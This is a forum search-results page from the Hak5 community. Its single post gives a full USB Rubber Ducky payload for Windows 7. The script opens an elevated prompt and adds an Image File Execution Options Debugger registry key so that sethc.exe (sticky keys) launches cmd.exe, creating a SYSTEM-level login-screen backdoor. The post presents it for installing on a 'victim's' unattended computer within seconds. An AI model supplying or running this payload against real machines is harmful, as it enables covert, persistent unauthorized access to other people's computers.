Jump to content

Search the Community

Showing results for tags 'login screen'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 1 result

  1. I know that if you have physical access to a computer, it's pretty much owned. But the reason I wanted to make a rubber ducky payload of this old backdoor is that you only need a few seconds to install the backdoor. I.e when the victim leaves his/hers computer unattended without putting on screen saver with password, you put in the rubber ducky and install this payload. After this you can a) press the SHIFT key continuously for 5 times or B) Alt+Shift+PrintScreen which will open a command prompt with system privilege. Simple and cool :-) Make sure to take a backup of the original sethc.exe. I have had some encoding issues, be sure to check out which keyboards the rubber ducky firmware supports. I have edited the code without testing it again, but I think it still will compile and run as planned. Tune the delay parameter for your own pc. I have made the delays long enough for you to see what's happening. Enjoy. The victims machine must have admin privileges for this to work. REM Author: Asbjørn Reglund Thorsen <art@awaresec.no> REM Target: Tested on Windows 7 REM Description: Replaces the "Sticky keys" on windows 7s login screen with the "command prompt" executable REM References: http://carnal0wnage....ticky-keys.html REM http://www.redmondpi...n-login-screen/ ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 DOWN DELAY 400 DOWN DELAY 1000 ENTER DELAY 1000 LEFT DELAY 1000 ENTER DELAY 1000 STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" STRING /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" DELAY 400 ENTER REM Notes: REM Thanks to Espen Grøndal who told me about this "feature" REM The trick does not work when the Sticky Keys are disabled. REM If you see the message that says “The operation completed successfully”, that means you have installed the backdoor. REM Cleanup: You can use reg edit and browse to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" and remove the sethc.exe file.
×
×
  • Create New...